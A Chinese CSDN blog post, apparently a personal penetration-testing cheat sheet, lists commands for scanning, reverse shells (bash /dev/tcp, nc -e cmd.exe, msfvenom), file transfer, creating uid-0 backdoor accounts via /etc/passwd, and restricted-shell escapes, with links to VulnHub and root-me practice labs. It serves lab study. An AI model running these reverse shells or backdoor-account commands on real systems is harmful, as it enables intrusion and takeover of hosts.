【阶段总结】20201113

最新推荐文章于 2024-09-11 17:14:26 发布
最新推荐文章于 2024-09-11 17:14:26 发布
阅读量247 收藏 1
点赞数
分类专栏: 阶段总结 文章标签: shell python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/b10d9/article/details/109677125
版权

【阶段总结】20201113

信息收集

存活主机探测

  1. nmap -sn 192.168.1.10/24
  2. netdiscover -r 192.168.1.0/24 或 netdiscover -i eth0 或 netdiscover -i eth0 192.168.10/24

端口扫描

  1. nmap -sS -A -T5 -p- 192.168.1.1 #-p-是进行全端口扫描,-sS是用TCP SYN方式,-A扫描目标的服务信息和操作系统信息,-T5是扫描速率。
  2. nc -vnz 192.168.1.1 21-100 #TCP端口扫描,扫描192.168.1.1的TCP21到100端口,
  3. nc –vzu 192.168.1.1 161 #UDP端口扫描,扫描192.168.1.11的UDP161端口
  4. nc 192.168.1.105 21 #获取FTP banners
  5. nc 192.168.1.105 22 #获取SSH banners

网站扫描

  1. dirsearch -u http://URL -e php,txt,asp,html 或dirsearch -u http://URL -E #扫描网站目录
  2. printf “GET / HTTP/1.0\r\n\r\n” | nc 192.168.1.105 80 #扫描HTTP banner

漏洞扫描

  1. nikto -host 192.168.1.1/www.example.com #漏洞扫描

漏洞利用

  1. exploit-db.com #搜索exp的网站

反弹shell

Linux

  • BASH:bash -i >& /dev/tcp/192.168.1.7/1111 0>&1
  • PHP:php -r ‘$sock=fsockopen(“IP”,PORT);exec("/bin/sh -i <&3 >&3 2>&#");’
  • msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=6666 R #执行后,会生产一条命令,需要在靶机上执行。然后攻击机上运行nc -lvp PORT监听。
  • mknod /tmp/backpipe p #在目标靶机上创建backpipe
  • /bin/sh 0</tmp/backpipe | nc 192.168.1.109 443 1>/tmp/backpipe #在目标靶机上执行,创建netcat会话。

Windows

nc.exe 192.168.1.109 4444 -e cmd.exe #执行建立nc连接。

回连监听

  1. nc -lvp 1234 #监听1234端口。结合反弹shell使用。

webshell

中国蚁剑项目脚本分享:https://github.com/AntSwordProject/AwesomeScript

本地信息收集

  • uname -a #获取操作系统信息
  • lsb_release -a #获取操作系统release信息。
  • sudo -l #查看以root权限可以执行哪些命令。
  • find / -perm -u=s -type f 2>/dev/null 或find / -perm -4000 2>/dev/null #查找具有SUID权限的文件。
  • echo $SHELL #查看当前所用的shell环境。
  • env或printenv #查看环境变量。

文件传输

  • simpleHTTPserver:python -m SimpleHTTPServer 8000,8000是网站所用端口,执行命令所在路径即网站根目录。
  • nc –lvp 5555 < file.txt #发文件
  • nc 192.168.1.109 5555 > file.txt #收文件

下载

  • wget http://IP:PORT/filename

文件编译

  • gcc -o 编译后文件名 编译前文件名 -lcrypto #编译文件

提权

  • 利用提权exp。
  • echo “test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash” >>/etc/passwd #test/password@123,需要root权限。
  • useradd -p ‘openssl passwd -1 -salt ‘user’ 123qwe’ -u 0 -o -g root -G root -s /bin/bash -d /home/user venus #需要root权限。

受限shell绕过

系统环境信息收集

  • 检查环境变量,env或envprint
  • 检查shell环境,echo $SHELL
  • 检查以root权限,可以执行哪些命令,sudo -l
  • 检查是否有SUID文件可以利用。

绕过技巧

  • 进入vim,输入‘:’,进入命令模式,输入set shell=/bin/bash,再输入shell,若成功则可执行/bin/bash命令。

  • 添加环境变量,export PATH=KaTeX parse error: Expected 'EOF', got '#' at position 18: …TH:/usr/bin #̲加上PATH,把原有的path之后加上/usr/bin,而不是覆盖。

  • 利用Python、perl、ruby、PHP等编程语言调用系统模块执行指定shell环境。

    使用 except > except spawn sh,然后执行sh
    使用 python > python -c ‘import os; os.system("/bin/sh")’
    Python OS模块,python -c ‘import os;os.system("/bin/bash");’
    Python pty模块,python -c ‘import pty;pty.spawn("/bin/bash");’
    使用 php > php -a ,然后执行 exec(“sh -i”);
    使用 perl > perl -e ‘exec “/bin/sh”;’
    使用 lua > os.execute(’/bin/sh’).
    使用 ruby > exec “/bin/sh”

  • 运行/bin/sh或/bin/bash,切换shell环境。

  • 利用cp命令复制/bin/sh或/bin/bash到当前目录。

  • 进入gdb,输入 !/bin/sh 或者 !/bin/bash

  • 使用 awk > awk ‘BEGIN {system("/bin/sh 或者 /bin/bash")}’

  • 使用 pico > pico -s “/bin/bash” ,然后就可以对 /bin/bash 执行写操作,最后执行 CTRL + T

  • 使用 tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

  • 以下是网上找到的其他方法,暂时没环境测试的,先做记录。

    使用 ftp > !/bin/sh 或者 !/bin/bash
    使用 more/man/less > !/bin/sh 或者 !/bin/bash
    使用 rvim > :python import os; os.system("/bin/bash )
    使用 scp > scp -S /path/yourscript x y:
    使用 find > find / -name test -exec /bin/sh 或者 /bin/bash ;
    使用 ssh > ssh username@IP - t “/bin/sh” 或者 “/bin/bash”
    使用 ssh2 > ssh username@IP -t “bash --noprofile”
    使用 ssh3 > ssh username@IP -t “() { :; }; /bin/bash” (shellshock)
    使用 ssh4 > ssh -o ProxyCommand=“sh -c /tmp/yourfile.sh” 127.0.0.1 (SUID)
    使用 git > git help status > ,然后就可以运行 !/bin/bash了
    使用 zip > zip /tmp/test.zip /tmp/test -T --unzip-command=“sh -c /bin/bash”

练习

  • 受限shell绕过:https://www.root-me.org/en/Challenges/App-Script/Bash-Restricted-shells?q=%2Fen%2FChallenges%2FApp-Script%2FRestricted-shells&lang=en
  • kioptrix level 1:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
  • kioptrix level 2:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
  • kioptrix level 3:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
  • kioptrix level 4:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
  • kioptrix level 5:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
包大人在此
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
总结1(2020-01-14)
老练
01-14 437
一. 在浏览器页面上点击某个按钮或其他标签定位到指定的位置 1.1 用锚点 <!-- ①:设置一个锚点链接<a href="#miao">去找喵星人</a>(注意:href属性的属性值最前面要加#) --> <a href="#miao">去找喵星人</a> <!-- ②:在页面中需要的位置设置锚点<a name="m...
2020-12-12学习总结
weixin_43845348的博客
12-12 294
使用@GetMapping得不到返回值(不能是json格式) post请求,如果是接收json格式(要求传输参数是json(application/json;charset=utf-8),接收参数要是一个参数或者是一个对象并且参数前加上@RequestBody注解);如果是表单提交(application/x-www-form-urlencoded),接收参数没有要求即可以是对象也可以是多个参数的接收方式 get请求,参数不能是json(application/json;charset=utf-8)格式,只
Docker的常用知识
qq_45980402的博客
08-12 227
Docker常用
Docker与微服务实战(高级篇)- 【上】
qq_45740503的博客
01-13 1288
Docker与微服务实战(高级篇)- 【上】
《小学语文拓展性阅读教学研究》课题阶段总结.pdf
09-27
《小学语文拓展性阅读教学研究》课题阶段总结.pdf
在疫情防控阶段总结大会上的讲话.docx
01-28
在疫情防控阶段总结大会上的讲话.docx
上半年少先队工作阶段总结.docx
02-10
上半年少先队工作阶段总结.docx
个人工作阶段总结.doc
10-14
个人工作阶段总结.doc
诚信教育活动阶段总结.doc
03-03
诚信教育活动阶段总结.doc
C++入门(05-2)从命令行执行C++编译器_GCC
学海无涯
09-07 1092
GCC(GNU Compiler Collection)是一个开源编译器集合,是支持多种编程语言的编译器,如C、C++、Fortran、Java等,支持所有主流平台,无论你在哪个平台上学习,GCC提供一致的开发过程,意味着可以在任何环境下练习 C++编程,不用为不同的操作系统寻找不同的编译器。开源且免费,可以集成到其他环境,例如VisualStudioCode中使用。gcc(用于C)和g++(用于C++)。在Windows中使用需要单独安装 MinGW(Minimalist GNU for Windows)
Shell入门
R_conqueror的博客
09-10 231
Linux中,所有进程的都默认有3各文件描述符,0 标准输入 1标准输出 2标准错误输出。将原有终端中输入和输出的地方定向到其他的地方。
详解 Pandas 的 query 函数
weixin_44480009的博客
09-09 324
方法能够使用字符串表达式来筛选 DataFrame 数据的行,类似于 SQL 的 where 子句。
Shell脚本流程控制(Linux篇)
m0_67771087的博客
09-07 1047
流程控制是改变程序运行顺序的指令。
DOS脚本分析
最新发布
YJlio的博客
09-11 266
S-1-5-19是本地服务帐户的安全标识符(SID),通常用于判断是否有足够的权限。:该行命令生成一个VBScript文件,通过Shell对象以管理员权限重新运行当前批处理文件(%~f0表示当前脚本的完整路径,runas表示以管理员权限运行)。else:如果ping失败(即网络连接中断状态),则显示提示信息并进入pause,等待用户按键,然后重新检查网络连接。ping *** >nul:通过ping命令检测指定服务器(***)是否有效。||: 表示如果前面的命令失败,则执行后面的部分。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 850
Linux中最强权限维持rootkit
adb 发送广播 && 恢复出厂
shiyudong的专栏
09-09 352
adb shell am broadcast -a 广播名android.intent.action.BOOT_COMPLETED。-n 表示packagename (com.koushikdutta.superuser)SuperuserRequestActivity是对应的Activity name。-a 表示action (android.intent.action.MAIN)启动activity/service。adb 发送广播 && 恢复出厂。10.0可以用下方法。
shell 循环的定义
qq_71371157的博客
09-06 1057
shell脚本编程中,循环是一种重复执行一组操作的结构。它可以帮助我们简化重复性任务的编写和执行,如果没有预期结果,不间断执行,我们通常称之为“死循环” ,与循环有关的三个专业名词:遍历,迭代,递归。其中,变量是用来存储列表中的元素的,列表是一组元素,可以是数字、字符串或文件名等。1.for循环: for循环是一种在给定的条件下,重复执行一组命令的结构。for 变量 in 列表。
探索Invoke:Python自动化任务的瑞士军刀
AIGC搞起
09-07 688
invoke是一个强大的Python库,它通过将shell命令封装为Python函数,使得自动化任务变得简单而强大。通过本文的介绍,你应该对invoke有了基本的了解,并能够开始在你的项目中使用它来提高效率。记住,自动化是提高生产力的关键,而invoke正是你实现自动化的瑞士军刀。
嵌入式系统入门概览:定义、阶段与组成解析
"嵌入式系统知识总结" 嵌入式系统是计算机科学中的一个重要领域,其核心在于构建针对特定应用的高效、定制化的计算平台。本文概述了嵌入式系统的基础概念,发展历史,以及其关键组成部分。 1、嵌入式系统的定义 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值